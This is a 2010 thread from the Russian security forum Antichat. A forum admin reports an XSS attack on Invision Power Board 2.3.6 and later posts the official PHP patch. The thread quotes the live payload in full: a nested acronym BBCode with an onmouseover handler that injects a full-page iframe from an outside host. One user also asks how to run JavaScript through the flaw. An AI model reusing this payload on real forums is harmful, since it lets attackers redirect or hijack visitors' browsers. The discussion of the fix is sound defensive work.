Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Пытаются ломануть через тег ipb (https://forum.antichat.xyz/showthread.php?t=184697)

goha 07.03.2010 14:41

Пытаются ломануть через тег ipb
 
Есть форум ipb 2 3 6

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

Код HTML:

[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

вот как работает тег акронима:
Код:

[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>

Как защититься и что делать?

goha 07.03.2010 15:19

вот похоже

http://forum.antichat.ru/threadnav10119-1-10.html

похожий способ взлома

Напишите кто знает как это в ipb прикрыть

POS_troi 07.03.2010 17:30

добавь фильтрацию параметров - передаваемых в acronym

goha 07.03.2010 23:04

Мозг вещь хорошая но еще нужны знания, у меня их нет чтобы баг фиксануть

http://forums.ibresource.ru/index.php?showtopic=60138

Вон, как показывает практика уязвимы все двойки ipb, я думаю баг знающие люди найдут способ и к тройке применить

goha 08.03.2010 19:56

Официальный фикс xss с акронимом в 2.3.6

Изменения

sources/classes/bbcode/class_bbcode_core.php

найти

Код:

# XSS Check: Bug ID: 980
                                                        if ( $row['bbcode_tag'] == 'post' OR $row['bbcode_tag'] == 'topic' OR $row['bbcode_tag'] == 'snapback' )
                                                        {
                                                                $match[ $_option ][$i] = intval( $match[ $_option ][$i] );
                                                        }

Добавить ниже

Код:

                                                        # XSS acronym
                                                        if ( $row['bbcode_tag'] == 'acronym' )
                                                        {
                                                                $match[ $_option ][$i]  = preg_replace( "/s((\\\|\)*)t((\\\|\)*)y((\\\|\)*)l((\\\|\)*)e((\\\|\)*)=/is", "st yle=", $match[ $_option ][$i] );
                                                                $match[ $_option ][$i]  = str_replace( array( ':', ';' ), '', $match[ $_option ][$i] );
                                                                $match[ $_content ][$i] = preg_replace( "/s((\\\|\)*)t((\\\|\)*)y((\\\|\)*)l((\\\|\)*)e((\\\|\)*)=/is", "st yle=", $match[ $_content ][$i] );
                                                                $match[ $_content ][$i] = str_replace( array( ':', ';' ), '', $match[ $_content ][$i] );
                                                        }

И это все.

Totgeliebt 09.04.2010 21:22

кто разобрался как ява скрипт через эту XSS произвести?

warlok 09.04.2010 23:05

Цитата:

Сообщение от Totgeliebt
кто разобрался как ява скрипт через эту XSS произвести?

http://forum.antichat.ru/showthread.php?p=997624


Время: 21:21